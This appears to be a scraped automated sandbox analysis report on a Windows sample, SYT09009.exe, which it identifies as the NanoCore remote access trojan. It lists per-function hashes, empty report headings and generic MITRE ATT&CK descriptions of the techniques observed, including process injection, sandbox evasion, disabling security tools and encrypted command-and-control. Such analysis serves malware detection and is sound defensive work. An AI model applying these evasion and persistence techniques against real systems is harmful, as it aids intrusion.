Instruction ID: faabd4d877f213996406570c2993b8a3c3d858e8b131aee7426e30ac4f4c2d2a
Opcode Fuzzy Hash: 3aad0d39270889e2dcf6d70a5fa0dc612867b83f9d5099db9e8d92ab5e7c19bb
Instruction Fuzzy Hash: D9F0AF317001618FCB5DA779A02C0BD7BE7AFCA52231980BAD50AC7399DF284C479746

Uniqueness

Uniqueness Score: -1.00%

Function 012205D0, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273866258.0000000001220000.00000040.00000040.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70c447f8306854e8d9ea616afc6061b1608255bfe3e862b040c293f692bdd08
Instruction ID: a70bc9b1404128579c52cbe1919c36d15a2296bcb276e0e16dbec07773751140
Opcode Fuzzy Hash: e70c447f8306854e8d9ea616afc6061b1608255bfe3e862b040c293f692bdd08
Instruction Fuzzy Hash: 4F01DB765093806FD7128F15DC41862FFF8DF46630709C49FEC49CB612D225A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02B11D7A, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f875046754038b8648569269d5906dd898ae017d20cf2badf960cf17c82aec61
Instruction ID: 4e12649eba32a151c0baa8752af89df92c913bba5706de268632d0ec4510189b
Opcode Fuzzy Hash: f875046754038b8648569269d5906dd898ae017d20cf2badf960cf17c82aec61
Instruction Fuzzy Hash: 0001F270E083829FC71A4735542576A7FF6AF82610F2880EE9846DB2D7DB688C4AC761

Uniqueness

Uniqueness Score: -1.00%

Function 02B117F2, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5ed7b507f5b961f7192792b3f331942ee19e5047f24744929598decba0ee36
Instruction ID: 8afe70a00ff4dbd47a576d9fbe1fdbecdd0ef8dec6a973869cc4e868a3afec61
Opcode Fuzzy Hash: bb5ed7b507f5b961f7192792b3f331942ee19e5047f24744929598decba0ee36
Instruction Fuzzy Hash: 44F0F430B042664FC709E73EC02066F3BD7AFC561472440A8D50ACB386EF289C06C796

Uniqueness

Uniqueness Score: -1.00%

Function 02B11D88, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c94baadc15d0b873bbfd15b03ffc7a62be7abdc0d2a68c81c52d98cf8460fac0
Instruction ID: 95a3d2c7358cc2b2070c7321d4f67f658c08b11ff64d4ce88ea9d896ab45f430
Opcode Fuzzy Hash: c94baadc15d0b873bbfd15b03ffc7a62be7abdc0d2a68c81c52d98cf8460fac0
Instruction Fuzzy Hash: E4F0C830A043829FC7195776942475A7FFBAF81610F1880A99456CB2C6DF749D46C761

Uniqueness

Uniqueness Score: -1.00%

Function 02B106C8, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b365dc4d213dc0a1b96856b1304aeb3466af8d8c42ab2f3fe2be038a236fc2e1
Instruction ID: 6539f1721e0253b86edca870d1ca53b2e9f1a7d04b350302cb96d94fc38705d9
Opcode Fuzzy Hash: b365dc4d213dc0a1b96856b1304aeb3466af8d8c42ab2f3fe2be038a236fc2e1
Instruction Fuzzy Hash: B5F0E576304240AFD3149B74D8446AD3BF9EF8A626F2400AAE165C62D8CA2144828752

Uniqueness

Uniqueness Score: -1.00%

Function 02B10640, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323f59e4001954aac82d2f7a77a66397c52f282af761d03a2c0d22abbbec0f9c
Instruction ID: d7c1928e431afa6d62a64368e7b0fe775e58b7b93e0e81fb9b934aa409bc7e2f
Opcode Fuzzy Hash: 323f59e4001954aac82d2f7a77a66397c52f282af761d03a2c0d22abbbec0f9c
Instruction Fuzzy Hash: 2FE092357004218B8B5CAB3A941C42E77EBAFCC9223188079EA1BC739CDF344C47879A

Uniqueness

Uniqueness Score: -1.00%

Function 02B118E8, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac4f9644896a85dd86889861785abb84529fb0cea21a23ecf745a545d6b1747
Instruction ID: 4c4780b644564d956a0ac97c1a304dd14596edc4a8cf9349ace7b6898c769831
Opcode Fuzzy Hash: 4ac4f9644896a85dd86889861785abb84529fb0cea21a23ecf745a545d6b1747
Instruction Fuzzy Hash: B9F030367012209FC758DF39E99888BBBA7EF89312310C47AA516D7259DE758C458760

Uniqueness

Uniqueness Score: -1.00%

Function 012205F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273866258.0000000001220000.00000040.00000040.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f5590033fc815d64c631772f24db7ab9aad39c3c952ad2b2da78e282c66db3c
Instruction ID: 214343db304380a0c7bbf2a864ae8ea52b347aab3b532debabed16ec00c0cc4b
Opcode Fuzzy Hash: 9f5590033fc815d64c631772f24db7ab9aad39c3c952ad2b2da78e282c66db3c
Instruction Fuzzy Hash: 3BE06DB66006005B9650CF0AEC82462FBD8EB84630718C47BDC0D8B701D236B505CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 02B118F8, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec148fdc700bfe6fb85e08cc6e624b5ff73232850ee1ddad3a396f060877c3e
Instruction ID: 5056a2d88fb150444662e3d332932e7fed58d8d6478f52f39943a387bd9c0ff0
Opcode Fuzzy Hash: bec148fdc700bfe6fb85e08cc6e624b5ff73232850ee1ddad3a396f060877c3e
Instruction Fuzzy Hash: 31E092323001249FC718EB39E88888FBB9BEFC9221310C43AF91AC7308DE719C0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 02B119A0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad4088e69eed2af56ee375394fe7087cc1df9abedd581f4b0f7fc6f243aa0b6
Instruction ID: 1fff69131a74a7139a961b8739a7756937c358940715a453a0cf160258de4f77
Opcode Fuzzy Hash: cad4088e69eed2af56ee375394fe7087cc1df9abedd581f4b0f7fc6f243aa0b6
Instruction Fuzzy Hash: 11E0C2323041208FC30866AEE010A5F77DEEBC9324B20407AE109C7350CEB5AC0143A1

Uniqueness

Uniqueness Score: -1.00%

Function 011223F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273733747.0000000001122000.00000040.00000001.sdmp, Offset: 01122000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a553c294a1b700f25e5f405ec3be3fe390edbaee9943556e65f6264a8781e5b
Instruction ID: 12bd115bbeaabe76a79849ec123c489e80da69173d975892ad7d9b0a5d9b3c54
Opcode Fuzzy Hash: 6a553c294a1b700f25e5f405ec3be3fe390edbaee9943556e65f6264a8781e5b
Instruction Fuzzy Hash: 80D05E79305AD14FE32A8A1CC1A8B993FA4EF51B04F5644FAE8008B663C378D591D610

Uniqueness

Uniqueness Score: -1.00%

Function 02B118BA, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c389a64e5f4670b314a1136e7cc5e7007a4ed3d66195804a849bf1917b145972
Instruction ID: e6ee7f4a6c51c9c5d97d93a6c96b9e8586abad74e856d204ccdbdbecf64ab2b6
Opcode Fuzzy Hash: c389a64e5f4670b314a1136e7cc5e7007a4ed3d66195804a849bf1917b145972
Instruction Fuzzy Hash: A5D012B040D3419FC745DF28D85685BBFF0AA55605F45D8ADD089C6012E234594CCB22

Uniqueness

Uniqueness Score: -1.00%

Function 02B10251, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac9b4dde18345a59a88b79a3486a2d3fd04200c0b4e07a060da3d9a8b0250eec
Instruction ID: 37b140c027db43f6add6cd22d3e0171c2cb8bd775282274c9a2ae78e27acbba4
Opcode Fuzzy Hash: ac9b4dde18345a59a88b79a3486a2d3fd04200c0b4e07a060da3d9a8b0250eec
Instruction Fuzzy Hash: AAD0123AB14000CFDF40A6BDF4051ECB791EFC5225B1050BBD50ADB651D9318D19C701

Uniqueness

Uniqueness Score: -1.00%

Function 011223BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273733747.0000000001122000.00000040.00000001.sdmp, Offset: 01122000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb794b4a67b10cddce08115e46a218400c146e575828f93833fba8f40cbd4506
Instruction ID: ca81a6178a89af85fbdf64bc8f3a45c195a9db41f48568e9a301f6e52f0c6f24
Opcode Fuzzy Hash: cb794b4a67b10cddce08115e46a218400c146e575828f93833fba8f40cbd4506
Instruction Fuzzy Hash: 50D05E342052814BD719DB1CC194F5D3BD4AF45B00F0644E8EC008B262C3B4E891C600

Uniqueness

Uniqueness Score: -1.00%

Function 02B10130, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d9c89a3be009c25df1e0a10d758ad7c58c35a98d63134a033c4a0e7c02f29de
Instruction ID: 5961a39b45d085f1005ae191c4512a28f410acf04e41bb70d394bf43e58fbf70
Opcode Fuzzy Hash: 5d9c89a3be009c25df1e0a10d758ad7c58c35a98d63134a033c4a0e7c02f29de
Instruction Fuzzy Hash: F8C02B3079060807DF1026F97C44326338CF780608F400870F81DC7148EF1DE8D04250

Uniqueness

Uniqueness Score: -1.00%

Function 02B118C8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a15ab90ba9b6624df1f7d2d07e38beb41a407d6a126741ab7df9df929f950b0
Instruction ID: 36cbdcc9ff82c473ac208e528e89e9bb9b49314593a980ba50cf60a559327d0b
Opcode Fuzzy Hash: 4a15ab90ba9b6624df1f7d2d07e38beb41a407d6a126741ab7df9df929f950b0
Instruction Fuzzy Hash: 21C01270418211AFC744EF28EC4596ABBF0EA80605F40C93CE48DC2114F270555CCB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SYT09009.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

Stealing of Sensitive Information:

Remote Access Functionality:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Function 00403348, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 10001000, Relevance: 6.1, APIs: 4, Instructions: 97
filememorytimeCOMMON

Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403CA7, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 0040390A, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EA1, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181
memoryCOMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 004030D8, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Function 004056E4, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre